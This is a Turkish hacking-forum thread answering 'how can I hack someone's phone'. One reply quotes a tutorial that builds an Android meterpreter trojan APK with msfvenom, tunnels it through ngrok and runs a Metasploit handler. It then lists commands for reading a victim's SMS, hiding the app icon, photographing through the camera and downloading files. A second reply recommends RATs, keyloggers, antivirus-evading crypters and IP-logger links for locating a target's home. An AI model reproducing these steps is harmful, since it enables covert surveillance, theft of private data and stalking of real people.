Birinin Telefonuna Nasıl Sızabilirim?

Tarihe göre sırala Oylara göre sırala
M

Mascar

Kıdemli Üye
17 Kas 2021
2,478
80
2,232
awesofc' Alıntı:

TROJAN(TELEFON HACKLEME) OLUŞTURMA​

KÖTÜYE KULLANIM KİŞİYE AİTTİR YAPİLAN HİÇBİRŞEYDEN SORUMLU DEĞİLİZ

Sırayla neleri anlatacağım
1)Metasploit,Trojen,Ngrok tanımları anlatılacak
2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum
3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur

1)
Metasploit,Trojen,Ngrok kavramları nedir?

A)Trojen nedir
B)Metploit nedir
C)Ngrok nedir

A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:

Veri silme
Veri engelleme
Veri değiştirme
Veri kopyalama
Bilgisayarların veya bilgisayar ağlarının performansını düşürme
Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz


B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.


C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)


2)
Metasploit ve Ngrokun nasıl kurulur?

A)Metasploit nasıl kurulur?
B)Ngrok nasıl kurulur?

A)Metasploiti kuralım;

Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin
Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz
bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin :D
kodlara gelelim
bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce
termux-change-repo
komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda
bu videoda yapılanın aynısını yapacaksınız





videodakini yaptıktan sonra başlıyalım kurmaya
(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)
1-pkg install git -y
2-git clone GitHub - jokzilla/metakurucu
3-cd metakurucu
4-chmod +x *
5-bash metakurucu.sh
toolumuz indi 1i seçiyoruz ve kurulum başladı
termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz
burdaki işlemimiz bu kadar şimdi ngroku kuralım

B)Ngroku kuralım;
termuxu tekrar açıyoruz
1-pkg install git -y
2-git clone GitHub - Umutkaratools/NGROK-KURULUM
3-cd NGROK-KURULUM
4-chmod 777 ngrok-kurulum.sh
5-bash ngrok-kurulum.sh
Ngrok kurulmadıysa BURAYA girin
ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;
ngrok - secure introspectable tunnels to localhost
kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)











3)
Trojan nasıl oluturulur;

ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki




online yazan yer kırmızı olursa demeki sorun vardır
ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir
termux-setup-storage
depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için
soldan kaydırarak new sesion diyoruz





resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)


msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve
trojaniniz sdcard(dahili hafızaya kaydoldu)

TROJENİ DİNLEMEYE ALALIM


msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından
Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;
↓↓↓
use exploit/multi/handler











burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;
↓↓↓
set payload android/meterpreter/reverse_tcp



Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;
↓↓↓
set LHOST 127.0.0.1



Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"
yazdığımız yere burdaki sayıyı alıyoruz "1275"
↓↓↓
set LPORT 1275



ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)
↓↓↓








help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar :D

İŞİNİZE YARIYACAK BAZI KOMUTLAR
Kurbanın telefonundan telefonunuza SMS alın:
Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.
dump_sms

Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:
Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.
hide_app_icon

Kurbanın telefonunun ses modunu değiştirin:
aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.
set_audio_mode -m 1
telefonu sessize almak için;
set_audio_mode -m 0

Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.
webcam_snap

Kurbanların dosya depolamasına erişin:
Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz
cd /sdcard

Kurbanın telefonundan herhangi bir dosyayı indirin:
karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın
download file-name
Genişletmek için tıkla ...
İyi Forumlar!
 
Oyla 0 Downvote
TURKHACKER2009

TURKHACKER2009

Kıdemli Üye
20 Eyl 2021
2,541
3
692
24
orhan56' Alıntı:
başkasını telefonu nasıl hacleye bilirim
Genişletmek için tıkla ...
Cihazı ele geçirmek istiyorsan
Trojan yapabilir
Rat virüsü yapabilir
Keylogger yapabilir
Kişinin ıp adresini alıp bu ıp üzerindeki açık portlara bakıp msfconsole üzerinden sızmaya çalışabilirsin fakat her açık port bir güvenlik açığı değildir ve açık portlardan sızması kolay değildir baya zorlar. Kişinin ıp adresini almak için şu siteyi kullanabilirsin= IP Logger URL Shortener - Log and Track IP addresses kişiyle iletişime geçip bu linke tıklattırmalısın tıklattırdğın anda kişinin ıp adresi telefounun ios mu android mi hangi tarayıcıyı kullanıyor ve ıp adresi sayesinde adresini görebilirsin fakat ıp adresinden adres bulmayı polisler yapabilir inrternet servis sağlayıcısından buluyorlar polisler yani sende uğraşıp bulabilirsin fakat doğru konumu bulması oldukça zor ben çok araştırma yaptım tam olarak doğru konumu bulmadım ama baya bi yakınlaştım kişinin nerede oturduğunu şo an biliyorum navigasyonu açsam giderim yani öyle söyliyim. Virüs yedirmekte sosyal mühendisliğe bağlı fakat bunu hedef kişiye yapmicak isen çok yöntem var sana şöyle söyliyim bir siteyi hackleyip ele geçirip oraya bile virüs koyabilirsin. Bunu yapıp hedef kişiye de atabilirsin vb vb çok senorya var aslında tabi bu dediğim olay kolay bişi değil. Sen en iyisi trojan keylogger rat araştır keylogger için Hatkey adlı bir tool var bunu öğren tavsiye ederim virüs porgramları bunu görmekte zorlanıyor ama crypter bulursan iyi our. Kolay gelsin. Bu illegal bişidir bunuda unutma arkadaşına vb yapacaksan yaptıktan sonra söylemini tavsiye ederim ailesine söyleyip dava yiyebilirsin bilgin olsun.
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.